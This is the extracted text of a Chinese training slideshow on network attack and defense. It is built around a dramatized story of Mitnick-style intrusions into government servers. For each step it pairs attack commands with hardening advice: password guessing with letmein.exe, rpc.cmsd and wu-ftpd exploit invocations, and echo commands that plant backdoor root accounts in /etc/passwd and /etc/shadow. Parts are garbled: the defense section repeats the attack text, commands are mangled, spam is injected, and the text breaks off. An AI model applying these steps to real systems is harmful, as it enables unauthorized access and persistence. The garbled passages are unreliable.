网络攻防演示_50597.ppt

网络攻防演示 前言 “这世界上没有进不去的电脑 ” ———世界头号黑客：KEVIN MITNICK 案例分析 在1999年5月,MITNICK入侵NASA 入侵五角大楼 2001年6月,在美国TMD搞得纷纷扬扬之制,MITNICK的得意弟子prime(网名)已经把目标瞄准了美国五角大楼的TMD计划资料,发现了五角大楼中的一台WINDOWS 2000服务器WEB存在printer漏洞, prime使用了他必威体育精装版发现的漏洞,成功增加了一临时管理员帐号,接着用终端服务成功登录该系统…….凭着黑客特有的毅力,在经过三个多星期的观察和窥探后,终于发现了TMD计划资料的确实存放位置,成功取得五角大楼最高机密资料-TMD计划。 入侵过程图解 详解 攻击组 可使用letmein.exe等攻击程序获得系统的帐号并进行猜测密码,在WINDOWS下使用以下命令 etmein \\ip -admin –g 并使用猜中的帐号密码为administrator/administrator,使用终端服务连接上该服务器 防守组 可使用letmein.exe等攻击程序获得系统的帐号并进行猜测密码,在WINDOWS下使用以下命令: letmein \\ip -admin –g 并使用猜中的帐号密码为administrator/administrator,使用终端服务连接上该服务器 方法一： 如果不需要共享目录文件服务的,可通过关闭SERVER服务,把该SERVER服务改为手动启动 方法二： 通过选择以下选项来限制只有合法用户才能建立连接本地安全策略-安全设置-本地策略-安全选项-对匿名连接的额外限制-没有显式匿名权限就无法访问。 专家分析 以上问题,主要被攻击原因是公司的安全策略的制定没有做好,网站投入运行前期工作准备不足,系统管理人员安全意识不够,没有对系统的帐号用户所使用的密码进行有效的监控 第二步 在获得了第一台跳板的控制权限后, MITNICK把第二台跳板服务器地址定为日本三菱网站（www.mitsubishi.co.jp）,那是一台SOLARIS的服务器,被发现存在RPC.CMSD漏洞。 攻击组 使用RPC.CMSD漏洞程序.远程获得ROOT权限,在SOLARIS下运行CMSD漏洞程序 cmsd –h hostname 2 IP telnet IP 1524 连上攻击后开放的端口 连上后运行以下命令来增加两个帐号留代以后作为登录该服务器入口(一个为root权限帐号,一个为普通帐号权限帐号) 攻击组 echo “hacker1:x:5000:10::/home:/bin/sh” /etc/passwd echo “hacker1::11401::::::” /etc/shadow echo “hacker2:x:0:0::/home:/bin/sh” /etc/passwd echo “hacker2::11402::::::” /etc/shadow 防守组 其实该问题,在不使用该服务的情况下,可以通过关闭 rpc.cmsd服务来解决。方法是在/etc/inetd.conf中注释掉下列行： 100068/2-5 dgram rpc/udp wait root /usr/dt/bin/rpc.cmsd rpc.cmsd 然后重新启动inetd.如果真的需要使用该服务时, 下载并安装上以下补丁,运行以下命令: Wget /pub/patches/107022-08.zip unzip 107022-08.zip patchadd ./107022-08 专家组 大家可以看到以上问题,主要是由于Sun MicroSystem公司在设计rpc.cmsd服务端时的错误，造成一个远程的入侵者可以通过Rpc.cmsd的远程缓冲区溢出漏洞获得系统的管理员权限,而且管理员安全意识不够,没有做好系统的维护工作,也没有为系统打上及时的补丁,所以说一个公司或企业安全策略的制订是非常必要的。 第三步 在获得了两台跳板的访问控制权限后,他又继续将第三台跳板服务器定为北约网站,该服务器是一台Linux的服务器,被发现存在wu-ftpd 2.6.0漏洞 攻击组 使用WUFTP漏洞程序,远程获得ROOT权限,在LINUX下使用WUFTP漏洞攻击程序: ./wu26 -t IP -s 0 连上后运行以下命令来增加两个帐号留代以后作为登录该服务器